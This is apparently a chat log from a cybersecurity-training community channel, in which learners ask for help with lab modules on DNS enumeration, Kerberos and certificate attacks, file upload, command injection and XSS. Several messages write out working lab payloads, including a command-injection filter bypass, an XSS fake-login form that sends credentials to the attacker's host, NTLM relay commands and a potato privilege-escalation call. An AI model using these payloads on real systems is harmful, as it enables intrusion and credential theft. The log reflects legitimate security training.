#modules

Module:Shells & Payloads; Task:The Live Engagement. I am using the Parrot machine provided, but it keeps failing to access the website (port 80 and port 8080). I keep getting the connection has time out issue. This is for Host-1 from the Footholding machine. I tried using Chrome and Firefox. Trying to investigate the issue seems to get the "connection to this site is not secure". I remember a while ago that some browsers were going to block connections to sites that are not using encryption(https). Could this be the issue?. I can't complete this assignment if I can't access the website.

|| Yes I tried dc1 and dc2 but I have nothing ||

The answer is inside the picture + delete it 😄

its not worknig

i get it a long back

(format: "/directory/names") 😄

ok wait

thank you

i hate my self

goti

There is an image on the page with IPs. After connecting to RDP, try to access the website using the Host-1 hostname IP, and make sure to port scan

I re tried everythings but still don't find it

y'know if you gonna use spoiler tags might as well take it to DMs

|| when I'm brute forcing w ""for sub in $(cat /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.14.128 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done "" It only shows me 3 sub ||

@quiet heart || I tried this for sub in $(cat /opt/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.dev.inlanefreight.htb @10.129.92.82 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done ||

I also tried resetting the vm several times. Still the same result. My printerbug.py doesn't wanna work when I point it to my target.

You can DM me if you want

<@&861185840277487616> looks like the copy pasta has arrived in most of the channels.

In Password Attacks – PtT from Windows the task is to use John’s TGT to perform a Pass-the-Ticket attack and retrieve the flag from \DC01.inlanefreight.htb\john. After several resets I only find john.txt (which is the answer to the next question) and Julio.txt in the Julio folder (not accepted). Where is the flag for the question: “Use John’s TGT to perform a Pass the Ticket attack and retrieve the flag from the shared folder \DC01.inlanefreight.htb\john”?

I'm assuming a connection issue/vpn config is getting me in the
information gathering > DNS zonetransfer
academy question set.

dig axfr @nsztm1.digi.ninja zonetransfer.me
works great

dig axfr @ns1.inlanefreight.com zonetransfer.me
fails
connection to [TargetDNS.IPADDRESS]:53 failed timedout

Using the openvpn file given in the lab. tried on parrot and home lab kali box.

What am I missing please and thank you

ns1,inlanefreight.com
aren't you attacking inlanefreight.htb?

also same response to

zonetransfer.me

I'm having issues with the Password Attacks, Pass the Certificate admin question. I've seen posts here about how the tool in the section doesn't work for the adcs attack anymore as PKCS12 is deprecated and have been trying workarounds but none have yet to work. Does anyone have a simple workaround i can implement?

Hi, i need some help on the infogathering web edition module, vhost section. Im trying to brute force but no tool or command seems to work or give any output. Am i missing something?

The method worked just fine for me. No issues with depreciation

Try :
dir \\DC01.inlanefreight.htb\john

\c$\john isnt \john

Did you modify /etc/hosts?

No 😬

Depends on the tool

I used both gobuster and ffuf but i guess my main problem was not editing the hosts file

i done it exactly how was done in the module and got the error with ntlmrelay

Modify it and try again with gobuster or ffuf ..

With ffuf you need the -H "FUZZ.inlanefreight.htb"

And the url can either be inlanefreight.htb or the spawned ip

Thanks, cant believe i forgot that step

Alright lemme try

"Got the error" what error? And is that error addresses in the reading

] Servers started, waiting for connections
[] SMBD-Thread-5 (process_request_thread): Received connection from 10.129.178.63, attacking target http://10.129.95.150
[] HTTP server returned error code 200, treating as a successful login
[] Authenticating against http://10.129.95.150 as INLANEFREIGHT/DC01$ SUCCEED
[] Generating CSR...
[] CSR generated!
[] Getting certificate...
[] SMBD-Thread-7 (process_request_thread): Received connection from 10.129.178.63, attacking target http://10.129.95.150
[-] Authenticating against http://10.129.95.150 as / FAILED
[*] GOT CERTIFICATE! ID 13
Exception in thread Thread-6:
Traceback (most recent call last):
File "/usr/lib/python3.13/threading.py", line 1043, in _bootstrap_inner
self.run()
~~~~~~~~^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 42, in run
ADCSAttack._run(self)
~~~~~~~~~~~~~~~^^^^^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run
certificate_store = self.generate_pfx(key, certificate)
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx
p12 = crypto.PKCS12()
^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in getattr
obj = getattr(self._module, attr)
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'

Not the error in the reading

commands: impacket-ntlmrelayx -t http://10.129.95.150/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication, (kali㉿kali)-[~/Tools]
└─$ printerbug INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.178.63 10.10.15.166
[*] Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[] Attempting to trigger authentication via rprn RPC at 10.129.178.63
[] Bind OK
[] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.
[] Triggered RPC backconnect, this may or may not have worked

Error is the openssl PKCS12 being deprecated since the module was written

Modified and yet nothing

Can you send the command you used?

gobuster vhost -u http://94.237.55.43:48282 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

You’re missing -H

@fathom pendant any ideas?

Replace the IP with the domain inlanefreight.htb and add --append-domain parameter

the solution to your problem is in the reading

i believe the oscrypto fix should also fix the pyopenssl issue

Now its saying "unable to connect to http://inlanefreight.htb, no such host"

inlanefreight.htb:port

Finally it worked
Thanks @quiet heart & @fathom pendant

Hey guys im rrom Czechia And in my life i can't find where to download the wpn config file to use shh can someone help me?

@rose lagoon don't provide direct solutions, keep that to dms (if requested)

installed oscrypto and get this: ─$ python3 gettgtpkinit.py -cert-pfx DC01$.pfx -dc-ip 10.129.234.174 'INLANEFREIGHT.LOCAL/dc01$' /tmp/dc.ccache
2025-09-12 15:50:19,989 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
Traceback (most recent call last):
File "/home/kali/Tools/PKINITtools/gettgtpkinit.py", line 349, in <module>
main()
~~~~^^
File "/home/kali/Tools/PKINITtools/gettgtpkinit.py", line 345, in main
amain(args)
~~~~~^^^^^^
File "/home/kali/Tools/PKINITtools/gettgtpkinit.py", line 302, in amain
ini = myPKINIT.from_pfx(args.cert_pfx, args.pfx_pass, dhparams)
File "/home/kali/Tools/PKINITtools/gettgtpkinit.py", line 49, in from_pfx
return myPKINIT.from_pfx_data(pfxdata, pfxpass, dh_params)
~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/Tools/PKINITtools/gettgtpkinit.py", line 58, in from_pfx_data
privkey, cert, extra_certs = pkcs12.load_key_and_certificates(pfxdata, None)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^
ValueError: Invalid password or PKCS12 data

but it don't work that not the solution

Hello
hello i have a problem on the Active Directory Enumeration & Attacks
can you help me ?

What type of problem and which section?

This is a completely different issue, invalid pw or pkcs12 data. IIRC the way you get the ccache it provides a key to decrypt the ccache

i ll dm u

Here please

on the DCSync part

@quiet heart I tried what you said me but I don't find the sub in the footprint DNS

the rdp connection always failed

here is the task

Try connecting to MS01, not ATTACK01

@quiet heart

Restart the lab

module : PASSWORD ATTACKS
Credential Hunting in Network Traffic
Question :The packet capture contains cleartext credit card information. What is the number that was transmitted?

i cant figure this out i tried the Pcredz , and tryed going through the wireshark as well but no luck

With wireshark, there is a request containing credit card information try to find it
(you can use wireshark filter)

The skill assessment is not broken, you juste have to do SQLi when you want to check the price

@swift dove please have you already finished the part of attacking the system? I’m stuck.

Yo

What fo yall think of the ALHacking tool

What's that got to do with modules

how do you guys run python2.7 ? I can't seem to find many simple tutorials on getting that to work. Despite that in modules there are exploits that drupalgeddon that require it so would be nice to practice

python2.7

yes I know the command I mean its not installed on pwnbox and not installed on my home lab,

sudo apt install python2.7

has no installation candidate 😄 pwnbox...

Can't exploit if I don't have EOL python versions ... mhm painful

GPT says:

  pyenv local 2.7.18
  export PATH="$HOME/.pyenv/bin:$PATH"
  eval "$(pyenv init -)"
  eval "$(pyenv virtualenv-init -)"
  source ~/.bashrc
  exec $SHELL
  python2.7 --version

It worked

hi guys i am stuck in a footprintg module in the SNMP section. The last question to enumerate a custom script i dont have any clue.

This actually did work haha! thank you

anyone?

Did you solve the question before the last?

yes

Hi. I'm having an issue with the identifier bot command. It says I should contact an Administrator or Moderator. Which channel is the right one to do this?

Run the same command, then search for the flag manually or using grep

@quiet heart but what i should look?

looks like you're identified, not sure what your issue is

I am not. I have an old account linked to this discord and I want to change it to my actual account

gotchu

next time direct message a mod/admin

instead of posting randomly in one of the channels

because it can easily get buried

I sent you a message weeks ago...

I have to contact someone else?

and that was weeks ago, where i can assume that if i wasn't busy or that you contacted someone else and got it resolved

Flag, it’s noticeable

@main ridge should be good now

@quiet heart i found but it's not working

Make sure there are no spaces before or after the flag

no space. but i have to run the .sh file or i need just the path?

You need to submit the flag, run the same command then search for the flag manually

@quiet heart thanks solved!

@charred ice Please do not post flags

I spoilered it. It wasn't even correct ig

Not to be rude, but it appeared fully visible to me and was only one character off. Best to avoid posting flags in any form and follow moderator direction. Regarding the exercise-- you're on the right track and very close to the answer, just double-check what character you missed when stitching it together. The correct format includes the usual HTB{...}.

@charred ice Do not post flags. Spoiler tag does nothing.

I didn't post flag this time. I just posted the file data

You did

no need to post flags or content from modules above tier0. just ask your question, anyone who has done the module can help without needing that additional info as they've seen it

What am I doing wrong here? Like I did split the string as it said. I can't understand how or why should I take HTB{} into account and why in general is wrong here

you never said which section you're on so it's hard to say

always include the module, section, and question

my guess is you're finding another flag entirely, or just not inputting it correctly

https://academy.hackthebox.com/module/41/section/519

3rd questions. Sorry for the thing

You've only done part of it. You need to unpack it as well.

Oh shit you were right. I was reading it a little wrong. Thanks for the help guys.

Yo i need a hacker

To ask a question

Just how to fill smth

What about @frozen yew

Ask @storm elk

[-h] [-u USERNAME] [-p PASSLIST] [-px PROXYLIST] [--prune PRUNE] [--stats] [-nc] [-m MODE]

Its for instagram

Just dont understand some of this stuff

I can send a pic in dms

You must have stumbled into the wrong Discord server. This server is for Hack The Box, not Instagram.

Hacking instagram is illegal

Im not gonna hack

Just asking

Thanks sherlok

Reach out to Instagram support if you need help

you're welcome

A hacking discord server that doesnt do hacking

Wow

This is not a hacking instagram server. It's a server related to HTB's platforms.

Why didnt u name it that insted of hacking

It is named HackTheBox...

but that's enough of this, stay on topic. this channel is for discussion of the modules, no one here is going to help you with illegal shit.

Bro, create an HTB account and start learning, it's better than wasting time on this

Whats a htb account

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Hello, Using Web Proxies --> Zap Scanner. ZAP doesn't show any critical RCEs or anything as it says it should in the module task

has anyone came across this error in the pass the certificate attack module?

i put the IP twice because if i dont impacket wont know the target.

hey, can someone give me a nudge in Windows Privilege Escalation(Miscellaneous Techniques)? i cant find anything, even after running winpeas - maybe im just missin it

You haven't specified a target domain for secretsdump to use. The syntax is in the help text for the command

@heavy mango

Interesting. Did you get a TGT ticket first?

yes. i have it, along with Jpinkmans

your -dc-ip is different in the two screenshots, are you using the right one?

@heavy mango i am using the second one after i saw my mistake

and you have the correct IP for DC01 in /etc/hosts?

@heavy mango

yes

i figured it out. thank you @heavy mango

What was it?

the CA ip was used instead of the DC i[

instead of the dc ip

hello everyone, anyone knows how to do file upload attacks? i am stuck with blacklist filter, i dont really know where i am doing wrong

I'm new in this, what do you recommend me to start programming and hacking, thank you

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

anyone?

Hi guys, I’m going through the course. I’m at file upload attacks, whitelists. I’m having issues getting the php scrip to execute. I was able to upload it in several different ways, but I can’t get it to run. I got 404s, blank screens and a error complaining about the picture has errors

What question

Read about Reverse Double Extension

There are many PHP extensions , try changing the PHP extension with any of the PHP extensions list, the following steps are explained in the section

I read it, but I’m still stuck. I’m following the instructions

A nudge would be appreciated

I can’t get the code to execute at all

Have you heard about the description field 😄

got it! thanks alot<3

Try changing the PHP extension with any of the PHP extensions list

Got it already. Thanks !

@little shadow Please do not reveal content from modules above tier 0.

Sorry, I didn't know it wasn't allowed. Could I DM you about the question?

I'm busy sorry

Hello, I am doing the skill assessment on Web Fuzzing, but I don't know if I am doing something wrong or don't know in which format I should input the answer. The formulation is a bit confusing. It says:

What are all the sub-domains you can identify? (Only write the sub-domain name)

I did found multiple sub-domains, but which should be format for multiple answers? I tried x, y,z and x y z and just x or just but it doesn't seem to be valid. So, at this point I don't know what is wrong? I also tried http://x.domain , x.domain just x, and other variations

x y z is the expected format

so like

www dev admin

Oh, yes it worked. It would be helpful to have an example in there like other modules have. Thank you!

#1234357888114364508 if you want to suggest something 😉

So I assume for extensions is the same format, but should it include . or not?

it's with .

I can't get the curl command to work on https://www.inlanefreight.com as part of one of the Linux fundamentals questions. I'm not looking for help in answering the question just help on why curl doesn't work. I made sure I was using the Pwnbox instance and not still ssh into the target machine so I must be missing something

Using pwnbox?

yes

That's why, if youre on a free account pwnbox has a lot of limitations

You can buy $5 worth of cubes to remove the restrictions (or use your own vm)

oh but it says too but I guess it doesn't mention anything about what style account works

I see, ok thank you!

Its just a restriction on free accounts

(Aka you spend $0)

But spending any amount of money on academy lifts pretty much all the pwnbox restrictions

Can I please get a pm for XPath - Blind Exploitation (CWEE)

Hi

guys i need help with footprinting

What is the FQDN of the host where the last octet ends with "x.x.x.203"?

on the DNS part

I see the mistake I was making, thank you!

hello i have a little prob in the course in the Active Directory Enumeration & Attacks exactly on the privileged access section

Anyone can give me a nudge for password attacks skill assessments, || i've manage to found .pcap files inside ** shares, i've tried to extract the hash with john tools (pcap2john, wpapcap2john and any pcap related) none of them works either showing illegal instruction, not supported, or file has wrong size, also am i even in the right path?||

omg im so idiot i thought the files asking for a password instead its prompting my root password to open the files 😭

what's your prob

When i want to connect to the attack vm

With the htb-student:Academy_student_AD!

It returns

Permission denied

are you use xfreerdp?

Nah the attacker machine is a linux os not windows

hey can anyone help me in using crackmapexec modulle + 0 Use the service account you found to access the shared folder serviceaccount and read the flag. I can't seem to connect

guys i need help with footprinting

What is the FQDN of the host where the last octet ends with "x.x.x.203"?

on the DNS part

module : password attack , Credential Hunting in Network Shares

One of the shares mendres has access to contains valid credentials of another domain user. What is their password?

i tryed but the op of the tool Snaffler is too massive ,

which section?

sorry,have you done?if not you can dm me

Module: Pivoting, Tunneling, and Port Forwarding

I am trying to perform a full TCP connect scan with Nmap after setting up dynamic port forwarding on port 9050.
I'm not getting the expected results, but I am able to connect via RDP.
Is there something wrong with my procedure or the command? Can someone help me?

is there a process if someone can contribute to htb academy?

Yeah if you get hired at HTB

😭

I'm not very familiar with proxychains as I always use Ligolo-ng.
I would advice that you do the same, it makes pivoting so easy & you won't face similar issues.

guys i need help with footprinting

What is the FQDN of the host where the last octet ends with "x.x.x.203"?

on the DNS part

Hi there, im currently in this module "password attacks", and im trying to solve: Mount the BitLocker-encrypted VHD and enter the contents of flag.txt as your answer.

the thing is, when i try to mount the .vhd file, it doesnt create the /dev/loop0p2 partition

dont know how to solve it, i did some research and i saw that the minimun file size is 64MB, which makes me think the file is not to blame here

How do I send msgs in general😭😭

well, solved: had to do it on windows

The instructions are in #welcome

Oof

Hey all, I'm currently on Network Foundations module - Skills Assessment. I'm trying to follow the optional task called "Target Acquired".
Now the issue I get is when I'm connected to the FTP and in passive mode, and calculated the port number, I get "connection refused" error message instead of "open".
I followed the task to the letter, so I'm a bit confused what did I do wrong. Can anyone please help?

Is there a hacker that could help me? 😛

If it's related to modules

It Isnt😭

Then no

I can't seem to

Nope, this server isn't for that. Reach out to support on the website.

I tried to

Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.

i found ns.inlanefreight.htb and root.inlanefreight.htb

the answer is ns.inlanefreight.htb, why is it not root.inlanefreight.htb?

they both look like FQDNs to me

Anyone have experience with an error when trying to spawn target "Error - not enough permissions to create a genesis"

found the solution (Claude to the rescue :D)

What you need to do:

Keep your first terminal open with the FTP control connection (the one where you ran nc 10.129.233.197 21)
Before connecting to the data port, you need to send a command that requires data transfer. The most common one is LIST to list directory contents.

Here's the correct sequence:
In your first terminal (control connection):
USER anonymous^M
PASS anything^M
PASV^M
(You've done this part correctly)
Immediately after getting the PASV response, send:
LIST^M
Then quickly, in your second terminal:
nc -v 10.129.233.197 49674
The key points are:

The data port is only opened when the server expects a data transfer
You have a limited time window to connect after sending the LIST command
The connection to the data port should happen almost immediately after sending LIST

Hi,everyone. I want to know why in HTB lab I completed the task 1 .suppose the task 2 will be unlock but I completed task 1 and submitted the task 2 is still lock?why?

What module is this for?

Just the Tier 0 ,Meow lab

I just finished that part, you need to enum the subdomain with another wordlist, I rmb something fierce, look for it 🙂

Yeah I got it already, but thank you so much for having the time to reply to my message😇

I can't figure this out either. But when I use my own VM instead of the pwnbox, everything works just fine. Like what r0GLITCH said, just use ligolo lol.

Can anyone help me with Ai red teaming ctf going on live. I am struggling with last challenge

Unfortunately, we cannot offer any assistance for active CTFs.

Okayy

Hi everyone. Please could someone help me for this part of module AI red teaming
Ai Red Teaming -> Attacking AI - Application and System -> Attacking the system
https://academy.hackthebox.com/module/315/section/3770

Is there a way to cancel and re try the target spawn?
I think mine got stuck, it has been 5 minutes and still spawning

https://academy.hackthebox.com/module/143/section/1489

Sometimes changing regions can help @lapis whale or just waiting

Seems to have kicked up now :D, thanks for the prompt response though 😉

Some just take a while to fully spawn

Hello guys im new here and i wanna be professional in network what do u suggest and what should i do in this server ?

Regarding the blacklist filter, can i DM?

can i DM you? i am following all the steps, all results are coming back as 200 in intruder

try dig dc1.internal.inlanefreight.htb @ip

When you directly query the A (or any other record) the server answers based on the allow-query option. In your example it makes sense to prevent lookups from an external endpoint to an internal subdomain. The axfr answer is based on the allow-transfer option and is obviously misconfigured here. Both default to any client.

you forgot the @ in front of the IP and now get NXDOMAIN instead of REFUSED

oh i see

that makes sense

root.inlanefreight.htb is a valid FQDN, but it’s just another host in the zone and not the one that identifies the DNS service’s IP.

hello i want to remove my billing options but i cannot as i forgot my old paypal creds can you remove it for me? if you can i have to do it today if possible

@sacred rock

Don't tag staff like that. You need to contact support.

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

ooh sorry i didnt know , support will be only available on modays 😭

i have to do it today

when you guys go through the modules, do you ya'll take extensive notes on the technical stuff or just on the commands with a short description?

Hello im trying to do advanced SQL injection skills assessment but I can't even get the source code, I keep getting access denied??

scp -r student@10.129.162.182:/opt/Pass2-1.0.3-SNAPSHOT.jar ./
The authenticity of host '10.129.162.182 (10.129.162.182)' can't be established.
ED25519 key fingerprint is SHA256:0RhCtT2MFrH2W8dgUHOrUktMt33E3zeFyi+wZVYPqNM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.162.182' (ED25519) to the list of known hosts.
student@10.129.162.182's password: academy.hackthebox.com
Permission denied, please try again.

can anyone help?

Hello, where can I ask for help/advice on HTB Labs?

Depends, on the lab first you'll need to verify your account (read #welcome)
Channels:

• #fortresses
• #vulnlab
• #challenges
• #boxes
• #sherlocks

~~Anyone that can help on DACL II Skills assessment Q3?

I know what I need to do, but I am getting skilled issued trying to execute it.~~

Nvm dug myself out

You forgot the @

Gm what are the ssh creds of ACADEMY-EA-ATTACK01 on the Active Directory Enumeration & Attacks

any help please

Haven't done this module, but aren't you supposed to provide a username and password with Powershell, and for that we need to create a PSCredential object

They did not provide a password, only a hash, so I used it to ask for a TGT using Rubeus and imported the ticket with ptt /ticket: flag.

Hello dose anybody know how to hack I need help with a situation im in

Module: Command injection
Section: Bypassing Other Blacklisted Characters
The exercice :
i have completed it with a different way but couldn't do it the way they said ( using semicolon instead of new line %0a)
My payload : ip=127.0.0.1$(tr${IFS}'!-}'${IFS}'"-~'<<<:)ls (Trying to bypass semicolon restriction)
using the same technique on a command works fine like
ip=127.0.0.1%0a$(tr${IFS}"[0-x]"${IFS}"[2-z]"<<<j)s (execute ls )

Guys who can help me on Active Directory Enumeration & Attacks

Exactly what are the creds if the ssh session of the attacker vm

I tried htb-student:Academy_student_AD!

Nd it didn’t work

Think about brute forcing

Which section?

Prisesc

Exactly the sql server part

Send the link

ah sorry Privileged Access

what are the creds of this vm

HTB does this from time to time.
You can probably find his credentials in the lesson itself.
Sometimes they mention the credentials once and re-use it across other sections within the same module.

You will find it in the section, under scenario

thanks @quiet heart

No one can help you with that here

Does anybody know if the AI Red Teamer Path will get a certification? It's been a while since I see it on the 'Job Role Paths' but still no cert

Hi guys, can anyone give me a hand in:
INJECTION ATTACKS, XPath - Blind Exploitation

I was able to find the users, but the password returns none

nvm found the bug in my code

Can I take the "Hacking Wordpress" module or is it being phased out due to the transition from CBBH --> CWES

I don't want to go halfway through something and it get yeeted.

The module will remain in the Academy. If I remember correctly, it is in the CJCA path.

Hello - I'm having issues with the CRACKMAPEXEC module 84 section 1747 (Skills assessment)

I am connected via chisel - but no matter what I try I cannot get any connection to the internal host to enumerate users. The question is: " What's the password of the account you found?"

It looks to be connection issue related - i cant scan the machine at all.

Type the command you used so it can be corrected

Have you tried visiting the site in your browser.

Add the IP of inlanefreight/the target to your /etc/hosts?

Otherwise curl it by its IP.

Np

Using the guided solution also not working

Have you tried ligolo-ng?

you cant here, the agent is prerunning from chisel

Web Proxies Skill Assessment 2nd question. I used CyberChef to get the value but how would one find which encoding was used manually

Can I please get a pm for XPath - Blind Exploitation (CWEE)

Same issue

you guys getting VPN issues ? got a DNS style output in my openvpn window. Might change vpns

seem to be getting the same on EU-VPN 5. Mhm can't connect to labs atm, something going on ?

Seems that my VM was just having a paddy. All good now

Can someone please help me? I was doing the Windows Command Line Introduction Module skill assessment and the task is "Access the host as user1 and read the contents of the file "flag.txt" located on the user's desktop." But when I try to connect via RDP (using this command: xfreerdp /v:10.129.153.38 /u:user1 /p:'.........') I get this error:
[14:47:46:128] [13699:13700] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[14:47:46:128] [13699:13700] [WARN][com.freerdp.crypto] - CN = ACADEMY-ICL11.greenhorn.corp
[14:47:46:430] [13699:13700] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[14:47:46:430] [13699:13700] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[14:47:47:177] [13699:13700] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[14:47:47:177] [13699:13700] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[14:47:47:177] [13699:13700] [ERROR][com.freerdp.core] - freerdp_post_connect failed
And I don't know how to solve it

@rare mirage careful not to spoil content of modules above Tier 0

they dont like that...

However ive just taken a look and you're connecting with xfreerdp but the method it wants you to connect with is ssh.

sorry it was unintentional

All good, use the password you had in that message above (see you censored it now :)) in the ssh connection and you should be able to get the flag from there

re above

ok thank you very much

Hey, maybe I'm just stupid, but in the skills assessment in the hacking WordPress module, the target IP is simply not a WordPress website. It's probably just me, but I'm stuck. The previous part of the module went perfectly. Can anybody help me?

hey n9t1m, if I remember correctly it is a wp site but it sits on a vHost so you'll need to add it to /etc/hosts. Have you done this already ?

What's V host short for?

Virtual Host

So why aren't they reachable normally via DNS resolver instead of having to add it to /etc/hosts

You can use fuff or gobuster to find some vhost (or other tools), just need a wordlist, from SecLists for example, and the URL of the target.
To popularize what a vhost is, it is a subdomain.

vHosts are subdomains that when put into hosts file you're able to resolve, without it you're sent to the IP of the site which may not be hosting the website or even the remote DNS server may not have a record of the domain, the benefit of vhosts is they allow you to host multiple apps off of one host / sharing the resources of the server. So putting into /etc/hosts you'll be able to resolve the domain locally by specifying the IP it can be reached at.

I'm sure others will have better descriptions but thats my understanding

gobuster vhost -u inlanefreight.local -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50 -k -q --append-domain this command saved my butt a few times going through the modules towards end of CPTS. vHost enumeration (after placing the lab ip into the /etc/hosts with inlanefreight.local)

Hello guys, in the documentation and reporting module, and for the second question in the "Notetaking and Organization" section, basically asking how to do a vertical pane split in tmux, I'm having an issue with the formatting of the answer. I don't want to post the answer here since its a tier 2. I just need help with the formatting if someone is able to help.

Thank you!

The answer is in the section. All you have to do is copy and paste it without making any modifications to it, without ()

Can someone explain me the usage of rpcclient $> enumdomains?

Just finds existing domains

whats the meaning of domains in the smb environment?

Wym? No Active Directory?

im in the Footprinting module - SMB section

I dont know what Active Directory is

if theres no AD then it will probably be enumerating the workgroups

i can't understand what you are telling me, sorry but im a newbie

this is the example in the section

they explain what a workgroup is in the samba section

Its different groups and domains

Builtin refers to the "Builtin" or native stuff

I have a question: If you go through the Academy. Can you learn how to go through CTF ? A complete beginner. Basically, I’m just curious if it’s worth going through the Academy and all other modules be enough for a beginner to be able to compete in CTF?

The skills gained in academy go beyond ctf skills, but yeah uou can use them in ctfs

Module Name: Linux Fundamentals
Section Name: Filter Contents
Question: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths (https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer.

My current attempt does look like this: curl -Ls https://www.inlanefreight.com | grep 'https://www.inlanefreight.com' | sort -u | grep -o '/' | wc -l

I have no idea how to count all unique paths. I appreciate any help...

Your attacker box can't reach the Internet. Weird it's trying over IPv6.

Have you fixed your networking issue? 😄

You think so? The thing is, I don’t want to be in cybersecurity or anything like that. I just would love to be able to navigate around the CTF events. You think the Academy will allow me to do so?

yeah

Thank you

hey please I have problem with the flag in model deployment tampering. Were you able to read having the flag?

for me i have
{
"code": 500,
"type": "InvalidWorkflowException",
"message": "Failed to parse yaml."
}

Can someone help me? I'm in the Windows command line module skill assessment and I'm in task 10 where the objective is to find the user with the most failed logon attempts and I can't find him. I'm using this code and it's still failing.
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4625} | Group-Object {$_.Properties[5].value} | Select-Object Count,Name | Sort-Object Count -Descending

I think you need to use the command Up Down Up Down Left Right Left Right A B Select Start

I got some questions and i need help if someone really advanced can help me lmk.
(only really advanced people tho)

Just ask your module related question here.

@patent remnant

Please don't just randomly ping people

Hey guys ,I'm new to hack the box and i would like to learn , can sombody tell me what should i do beacause im like 0% in this and i hope i get good advices👍

Hi

Check out this blog post. Here you can learn the first steps.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Should I do CJCA or SOC path first if I already graduated college and have a begginer-intermediate knowledge

SOC path

CJCA is a beginner cert, CDSA is intermediate

Bet ty

Cause I’ve done CTFS already and did like Tryhackme and wanna level up

hi @fathom pendant on migration to CWES cert does the modules we have now on the list due to change? or what ?

Theres the announcement in #academy-announcements that explains the gist

hello,every.I need help about module Active Directory Enumeration & Attacks at section AD Enumeration & Attacks - Skills Assessment Part II,question:Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.I tansfer ||juicypotato|| to SQL01 via ||xp_cmdshell|| and i use command ||xp_cmdshell C:\Temp\JuicyPotato.exe -l 18000 -p C:\Temp\shell.exe -t * -c return|| COM -> recv failed with error: 10038,I also try other CLSID,it still return same result.please give me some suggestions

finally, I use printspoof to get system

did you run GetCLSID.ps1 as well ? use the last CLSID from that output. If it still doesn't work you might consider switching to another well known exploit for that version of windows server.

you can DM me @eager spindle if a nudge is needed

Windows Lateral Movement, SA, Question 5, how do we get connectivity from the WSUS server back to attack host to upload files ? Solution downloads the files from the external IP of attacker machine but clearly that cant be since the WSUS server doesnt have a network interface with an external IP. Ligolo listener also doesnt work cause firewall is blocking unused connections as stated, so whats left ?

Module: Command injection
Section: Bypassing Other Blacklisted Characters
The exercice :
i have completed it with a different way but couldn't do it the way they said ( using semicolon instead of new line %0a)
My payload : ip=127.0.0.1$(tr${IFS}'!-}'${IFS}'"-~'<<<:)ls (Trying to bypass semicolon restriction)
using the same technique on a command works fine like
ip=127.0.0.1%0a$(tr${IFS}"[0-x]"${IFS}"[2-z]"<<<j)s (execute ls )

Hey im stuck at the first assessment in linux privilege escalation how can i get the flag ive enumerate every file but i couldnt get it

Do staff always do the cube talk every Fridays at 12AM EST?

i havent done that module but you can dm me

Anyone here who can give me a slight nudge for NoSQL skill assessment 2 ?

anyone help on this ?

I feel stupid. Thank you so much!

hey, can someone give me a hint in Windows Privilege Escalation Skills Assessment - Part I for the second question - Find the password for the ldapadmin account somewhere on the system.?
im already nt authority\system btw

.

in modul Xss , section phishing the send.php not response and get message "issus in url vailed" what is the problem

my payload is :

http://10.129.141.139/phishing/index.php?url='onerror="document.getElementById('urlform').remove();"><HTML ONpOIntEREntER= a = document.write('<h1><h1>Please login to continue</h1><form action=http://my_IP:80><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form><!--

any one geting any error or so wiste time in response ??

Hi I have a simple question. How can I share my progress with my student id ? Do we have like an API's URL ?

hello! I'm currently doing the AEN module and i have a few questions about reporting specifically in the exploited hosts appendix. my question is, when writing an entry in the appendix do you include even the hosts not used in the exploit chain to full domain compromise? for example if an exploit led to an RCE on a host not in scope, would you still add it to the appendix? or is it intended for all and every exploit you find?

this image is taken from a sample report hosted by htb.

<@&861185840277487616>

the sample report is still from a module above tier 0.

are you sure?

Which module did you take the sample from ?

but to answer: exploited host just means any host you exploited

doesn't necessarily mean the chain. Exploited hosts won't necessarily have to appear in your detailed attack chain

okay thank you, i should've added more context to the source.

